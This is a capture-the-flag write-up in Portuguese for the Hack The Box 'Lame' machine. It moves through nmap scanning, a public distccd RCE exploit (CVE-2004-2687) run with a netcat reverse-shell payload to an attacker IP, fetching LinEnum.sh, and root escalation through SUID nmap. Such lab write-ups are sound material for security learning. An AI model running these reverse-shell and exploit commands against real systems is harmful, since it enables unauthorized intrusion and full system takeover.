Skip to content

Lame

Referência em vídeo

Introdução Enumeração básica Tentativa FTP anônimo Tentativa de Exploit FTP vsftpd 2.3.4 Null session RPC com rpcclient Alterando o exploit FTP sem sucesso Explorando o serviço distcc v1 Escalação de privilégio via SUID Explorando SMB manualmente samba 3.0.20 Explorando SMB samba 3.0.20 com metasploit

Enumeração

sudo nmap_enum lame.htb | tee nmap_output.txt

qownnotes-media-QTYpLS

sudo nmap -p- -Pn -T5 -n lame.htb | tee nmap_fullportstcp_output.txt

qownnotes-media-QcPqMT

sudo nmap -sU -p 53,161,111,137,139,500,2049 -Pn lame.htb | tee nmap_udp_output.txt

qownnotes-media-xicthD

sudo nmap -sS --script vuln -n -T5 -Pn lame.htb -p 21,22,139,445,3632 | tee nmap_vulns.txt

qownnotes-media-kIGSvx

wget https://gist.githubusercontent.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855/raw/261b638bb05d02b67b6ad67fa9cf3c74a73de6c6/distccd_rce_CVE-2004-2687.py

searchsploit vsftpd 2.3.4

qownnotes-media-DxUQZF

Exploração

nc -nlvp 1403

python2 distccd_rce_CVE-2004-2687.py -t 10.10.10.3 -p 3632 -c "nc 10.10.14.17 1403 -e /bin/bash"

python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm

CTRL + Z

stty raw -echo; fg
reset

Escalação de privilégio

python -m http.server 80

wget http://10.10.14.17/4-privilege_escalation/LinEnum.sh

chmod +x LinEnum.sh
./LinEnum.sh

qownnotes-media-KPUoLb

qownnotes-media-qjiozK

suid nmap

/usr/bin/nmap --interactive
!whoami
!sh

qownnotes-media-BMAeCa